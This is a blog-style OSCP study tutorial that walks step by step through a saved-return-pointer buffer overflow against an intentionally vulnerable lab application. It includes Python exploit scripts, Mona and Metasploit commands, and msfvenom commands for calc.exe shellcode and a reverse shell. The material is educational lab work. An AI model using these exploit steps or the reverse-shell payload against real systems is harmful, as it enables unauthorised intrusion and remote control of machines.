Beginning Buffer Overflows (saved return pointer overwrite)

Most technical folks will have some level of familiarity with the concept of buffer overflows and the impact they can have.

Offensive Security’s OSCP/PWK course was the first time I’d gone through the process step by step to create one.

You’ll find several write-ups of how to perform this process but I wanted to write this up myself as:

  1. It helps me get the idea concrete in my own mind and writing this out forced me to answer some questions I didn’t understand – and it raised a few more questions for me too!
  2. You need to know how to do this to pass the OSCP exam and this seems to be an area that scares folks – especially those with an infra rather than dev background which is understandable. I think this is a shame as the steps seem straight forward, can be practiced and its worth a massive 25% of the total possible exam marks. This seems an easier 25 marks than exploiting the “hard” 25pt box
  3. I found the concepts interesting 😊

If you find any technical mistakes here please let me know as I’m still learning this stuff and want to know 🙂

Very Important! Only run on services/machines you own or have permission to

It should go without saying but you must only run this stuff on services or machines that you own or have permission to perform this on and be sure to update the code for your own setup.

Running stuff like this on machines you don’t have permission to could get you into a lot of trouble/cause damage/even Jail..

With that out the way the good news is that there are plenty of really good and legal options to practice this stuff such as:

  • Locally in a VM with various intentionally vulnerable apps (I’ll discuss how to do this shortly)
  • TryHackMe have a room with many examples for practicing ()

Other items of note

We should note that this is probably the simplest possible example of a buffer overflow possible.

Modern applications are compiled with special options (ASLR etc) that will make this process much harder/impossible and modern operating systems have additional checks to prevent this naughtiness.

There’s all sorts of stuff I don’t understand yet designed to prevent this from randomising addresses to putting stuff on the stack and checking it’s still there (stack canaries).

However don’t think however that Buffer Overflows don’t occur any more as there are many examples in some well known applications and they continue to be a massive issue.

Credits – Justin Steven Do Stack Buffer Overflow Good Tutorial

I’m going to base most of the code from code in Justin Steven’s awesome tutorial. This is a really great tutorial and I highly recommend you work through it as he goes into a lot more detail than I will.

Be sure as well to check out the Cyber Mentor’s Buffer Overflows made easy series on YouTube – I love how he explains stuff.

What you will need to follow along

If you want to follow along with my example that’s based on DoStackBufferOverflowGood tutorial you’ll need the following:

  • DoStackBufferOverFlowGood Tutorial and intentionally venerable app. I am going to make use of the excellent buffer overflow tutorial and code created by Justin Steven.
    Another option you could also use is VulnServer. In fact you should try this too. This app has several buffer overflows for you to practice. The easiest uses the TRN command and you’ll need to send “TRN /.:/” (the dot is needed as the app checks for it)
  • Kali VM (192.168.42.128 in my example)
  • Windows VM (192.168.42.130 in my example)
    You want an older version of Windows which does not have various protections in place. I used Win7 VM with IE11 x86 from https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
  • Immunity debugger (https://www.immunityinc.com/products/debugger/). You need to install this on the windows machine
  • Mona Immunity extension Python scripts installed. These scripts are copied to Mona extensions directory and add additional functionality we will use

Stages

Creating a buffer overflow has several steps and it’s important you don’t skip a step. If you do then it becomes very difficult to work out why stuff isn’t working so don’t be tempted to – it will save you time I promise!

So what are the steps?

  1. Check connectivity to the venerable app from Kali to Windows. We’re going to check we can connect to the vulnerable application with NetCat (nc) and send it some data
  2. Trigger the buffer overflow. We’ll write a python script and send data of sufficient length to trigger a buffer overflow
  3. Work out exactly how much data to send so data ends up in the EIP register. The EIP (Extended Instruction Pointer register) tells the computer where the next command to execute is and by putting data here we can control the program flow muhahaah
  4. Confirm we have targeted the EIP correctly. We will confirm we have everything right by adding the characters “BBBB” and checking they are in the EIP
  5. Remove Bad Characters. We cant use some characters in our buffer overflow for various reasons as they will stop our buffer overflow working. These are things like 0x00 which terminates strings.
    We’ll send the vulnerable app a list of all the possible characters then compare what is in memory to what we sent. If a character is not in memory we wont use it in Step 6 and 7 where we generate code (it’s a baaad character!)
  6. Locate the address of JMP ESP instruction in the app or it’s libraries. You might think you can just add our code to run at this point.
    Unfortunately, we cannot guarantee where stuff will be in memory so we cannot hardcode this. The solution is we’ll find the address of an instruction that stays the same and will return us to our shell code.
    We’ll look for a JMP ESP instruction as this will direct the flow to code at the ESP (Extended Stack Pointer or where we are on the stack) where our shell code will be ready & waiting. We’ll also need to remember to encode this in a special way as x86 processor will expect numbers or memory addresses stored back to front (code and ascii strings are front to back for reasons I don’t understand). This is referred to as little endian architecture.
  7. Finally we’ll generate our (shell) code we want to run using a tool called msfvenom. Shellcode is assembly code that the CPU knows how to execute directly. We’ll generate some (shell) code that will run calc.exe. Whilst you could also generate a reverse shell (a connection back to your machine) it isn’t a bad idea to do the simplest thing possible so you can be sure your code is working and are not facing other issues such as a firewall blocking your reverse shell.

    We’re nearly ready to go but we have one more issue to work through. When we generate shell code with msfvenom it can end up overwriting a few bytes at the top of the stack whilst it works out where it is in memory using an operation called GetPC (Get Program Counter). This can stop our shell code working.

    Two approaches to solving this are:
    Adding a load of empty (NOP or No Operation) instructions prior that wont do anything and can be safely overwritten. This is called a NOP sled
    Add a special machine code instruction to subtract from the ESP and move it up the stack away from the code we’ll generate

I picture the whole process looking something like the following.

I’m not convinced I have the order right here (and judging by other conflicting articles I read this confused others too). You dont need to understand this if you follow the process but I found it quite confusing the direction stuff was happening, variables were being added to the stack etc.

Step 1 – Confirm Connection

Before we do anything let’s check we can talk to the vulnerable app from our Kali machine so we know we have connectivity.

Make sure the DoStackBufferOverflowGood app (I’m going to call this the “app” now as this name is a bit long) is running. When it’s running you should see a console app listing the bytes received etc. You should also check the firewall is disabled on Windows machine. Next log onto your Kali machine.

I’m then going to use nc to confirm the connection (windows machine is 192.168.42.130 and its listening on port 31337) and send it “hello”:

You should get a response back from the app and in the Windows machine see it confirming bytes sent.

Ok we’re ready to write some code.

Step 2 – Python script to trigger bug
We’re now ready to write some code to send enough data to the app to trigger an overflow error.

On the Windows machine do the following:

Close the app as we’ll run it in Immunity from now on
Open the app in Immunity debugger
The app may pause at some points. Press the play button until the app shows the current status as “running” in the bottom right corner. Whenever you re-open the app you’ll need to do this
Back to the Kali machine where we’ll trigger the issue.

Important!
Make sure you update values to your setup otherwise it wont work or you could be sending some stuff to a machine you don’t have permission to (which er probably will do nothing but make sure you are not doing this).

You’ll need to change some of these values for your lab environment:
RHOST refers to the Windows machine the vulnerable app is running on
RPORT the port it is using (will be 31337 for this test app).

Note the line that reads: buf += “A”*1024 this is the number of A’s we’ll send the app to trigger the issue:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf = ""
buf += "A"*1024
buf += "\n"

s.send(buf)

Save your script (I called mine exploit.py) and give it executable permission with:

chmod +x exploit.py

We should now be good to run it with:

% ./exploit.py

If you have done everything right then you should see the app should crash and an access violation in Immunity. If you go to the register pane (top right) you should see the value 41414141 in EIP register. 41 in hex is 65 and 65 is the ascii code for “A” if you wondered where this came from – these are all the A’s we sent.

Step 3 – Work out how many characters it takes to overwrite EIP

The next thing we need to work out is exactly how many characters we need to send where we reach the point where we overwrite the value in the EIP register. My understanding is this value would normally tell the function where to return to. We’ll make use of this to redirect it to our shellcode later!

Whilst you could send these characters one at a time using trial and error to work this out there is a quicker way and we’ll use Metasploit’s pattern_create script. This will generate a sequence of unique characters we can send and then compare what ends up in the EIP to work out the position.

On the kali machine run the following command to create this pattern – note the -l 1024 is the length of the pattern we will create. As we know we can trigger this by sending 1024 A’s this will be enough:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024

We’ll then take this pattern generated and update the code to send this pattern:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf = ""
buf += ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab"
  "8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A"
  .. #ommitted for brevity
buf += "\n"

s.send(buf)

Remember to restart the app on the Windows machine and make sure its in a running state before running the script.

The application should crash:

We then need to see what characters ended up in the EIP register.

Here we can see the numbers 39654138:

On the Kali machine we’ll pass this number into a special script called pattern_offset.rb to work out this position:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39654138

This script should return the following message:

Exact match at position 146

Great – remember this number as we’ll need it for the next bit.

Stage 4 – Confirm we have the correct offset

OK things are looking good but we want to check this position is right so we’ll attempt to put 4x B’s in the EIP.

Note that the hex ascii code for “B” is 42 (42 in hex is 66 and 66 is B in ascii):

Update the code to the following – noting we added the position returned from the script below:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf_totlen = 1024
offset_srp = 146

buf = ""
buf += "A"*(offset_srp - len(buf))    # padding
buf += "BBBB"                         # SRP overwrite
buf += "CCCC"                         # ESP should end up pointing here
buf += "D"*(buf_totlen - len(buf))    # trailing padding
buf += "\n"

s.send(buf)

Again restart the app in Immunity and check its in the running state. When the app crashes you should see 42424242 in the EIP register (our 4x B’s).

This is awesome as we now have confirmed we can put what we want in the EIP (referred to as having control of the EIP):

Step 5 – Find Bad Characters

We’re not finished yet however and most apps will have some characters that for various reasons will stop our buffer overflow working.

It appears that almost always this will include 0x00 (NUL which also means end of string in C/C++) and often 0x0A (new line).

To work out what these characters are we will send all the possible bad characters and see what ends up in memory taking note of anything missing.

There’s a couple of ways to do this.

  • Using the mona command !mona bytearray will generate a list of bad characters for you to send and compare
  • Programmatically creating a file containing bad characters in code

I’m going to use Justin’s approach that generates a file with all the bad characters in range 0x00 to 0xFF which we can then copy to the Windows machine and compare in Immunity.

Our code is now:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

badchar_test = ""         # start with an empty string
badchars = [0x00, 0x0A]   # we've reasoned that these are definitely bad

# generate the string
for i in range(0x00, 0xFF+1):     # range(0x00, 0xFF) only returns up to 0xFE
  if i not in badchars:           # skip the badchars
    badchar_test += chr(i)        # append each non-badchar char to the string

# open a file for writing ("w") the string as binary ("b") data
with open("badchar_test.bin", "wb") as f:
  f.write(badchar_test)

buf_totlen = 1024
offset_srp = 146

buf = ""
buf += "A"*(offset_srp - len(buf))    # padding
buf += "BBBB"                         # SRP overwrite
buf += badchar_test                   # ESP points here
buf += "D"*(buf_totlen - len(buf))    # trailing padding
buf += "\n"

s.send(buf)

Save this script, restart the app in Immunity and run the script.

The app should crash as before and if we go to the register pane, right click on ESP and select the follow in dump option we should see what’s in memory:

If we go through the characters in order we can see 00 and 0A are not where we’d expect to find them ordered with the other characters:

There is an easier way however than manually looking through every character. Simply copy the generated file to the Windows machine C drive and run the following:

!mona compare -a esp -f c:\badchar_test.bin

Mona will then do a comparison and show us the values missing:

These are our bad characters. Take note of these as we’ll need them in a short time when we generate the code we want to run.

Stage 6 – Find a JMP Point

Now you might think you have everything you need to generate your code but there’s one more step we need to do.

We need to find a location in memory that wont change to put into the EIP.  We need to do this as:

  • The operating system may end up randomising some addresses
  • Stuff may move around in the app e.g. if it had multiple threads handling connections

There are certain things that will always be at the same location (gadgets) we can point the app at that will then return execution flow to where our shell code is ready and waiting.

We’ll look for an instruction called JMP ESP.  We can tell Mona to search all of memory for this instruction and also make sure that it doesn’t contain our known bad characters:

!mona jmp -r esp -cpb "\x00\x0A"

Mona has returned the following addresses:

0x080414C3

0x080416BF

We also need to check these points don’t have memory protection things enabled so check the ASLR, Rebase etc are all set to false.

If we want we can see the instruction at these addresses by right clicking on the address and selecting the “Follow Disassembler” option.

You should see JMP ESP command at both locations:

So now we have an address of a gadget we can use (0x080414C3).

However the CPU needs us to present this back to front (little-endian encoding).

We could either reverse this manually ourselves or import struct library and use .pack method – I think this is probably better as less error prone and its very easy to make a simple mistake.

Stage 7 – Generate Shell Code

Ok we’re almost ready to generate our code.

We’ll use a tool called msfvenom to generate machine code to fire up good old calc.exe!

Why kick off calc.exe – whilst you could go straight to a reverse shell its not a bad idea to do the simplest thing possible.

A reverse shell has other stuff that might get in the way e.g. firewalls/networks and if you don’t get a connection back you wont know whether it’s your exploit code or this. Firing up calc confirms our code works.  

We’ll generate shellcode using the following command and be sure to pass in the bad characters we found (\x00 and x0A):

msfvenom -p windows/exec -b '\x00\x0A' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread

Note if you want to generate a reverse shell below is the code you will want:

msfvenom -p windows/shell_reverse_tcp -b '\x00\x0A' LHOST=KALIIP LPORT=KALILISTENINGPORT -f python --var-name shellcode_calc

There are some gotcha’s you need to be aware of here:

Gotchas

  • Make sure you pass in the bad characters we have identified to msfvenom. Thats the bit that says -b ‘\x00\x0A’
  • It’s probably best to do the simplest thing like run calc.exe before trying to create a reverse shell to make sure your code is working before introducing additional complexity. There could be several reasons a reverse shell wont work such as connections being blocked
  • If you are creating a reverse shell make sure you can accept connections from the Windows machine by adding firewall exceptions
  • Make sure you have something listening to catch the reverse shell! (e.g. nc -lvnp 4444)

There’s one final step we need to do.

The first few bytes of our shellcode could get overwritten accidently. This is apparently because the generated code needs to work out where it is in memory which can involve a call to a routine called GetPC which can overwrite some of the shell code. We want to make sure this doesn’t happen.

There’s 2 ways of doing this:

  • Put a load of empty instructions that can be overwritten (NOP sled)
  • Add an instruction to move the ESP away from our shell code

Option 1 – NOP (No Operation) sled
Add below before shell code:

buf += “\x90” * 12 #NOP sled

x90 is the x86 instruction for doing nothing in case you are wondering.

Option 2 (better practice)

We can generate an instruction to move away from the Shellcode with metasm_shell e.g.

/usr/share/metasploit-framework/tools/exploit/metasm_shell.rb
sub esp, 0x10

This is considered better practice and uses less space which could be important if you have limited bytes to work with.

So our final code will look something like:

#!/usr/bin/env python2
import socket
import struct

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

BYTESTOSEND = 1024
buf_totlen = 1024
offset_srp = 146
ptr_jmp_esp = 0x080414C3 #JMP ESP gadget location

shellcode_calc =  b""
shellcode_calc += b"\xb8\xa9\x2c\x37\x99\xda\xc5\xd9\x74\x24"
shellcode_calc += b"\xf4\x5b\x31\xc9\xb1\x31\x83\xeb\xfc\x31"
... #ommitted for brevity


buf = ""
buf += "A"*146      # padding
buf += struct.pack("<I", ptr_jmp_esp)   # SRP overwrite
buf += "\x90" * 12 #NOP sled
buf += shellcode_calc               # ESP points here
buf += "D"*(buf_totlen - len(buf))      # trailing padding
buf += "\n"

s.send(buf)

I found Immunity could sometimes interfere with the shell code so I’d close it out of Immunity and run as an app.

All being well you should see calc pop up on the Windows machine!

Next you might want to generate reverse shell code and replace the calc code in exploit.py.

Here’s a reverse being caught using this approach: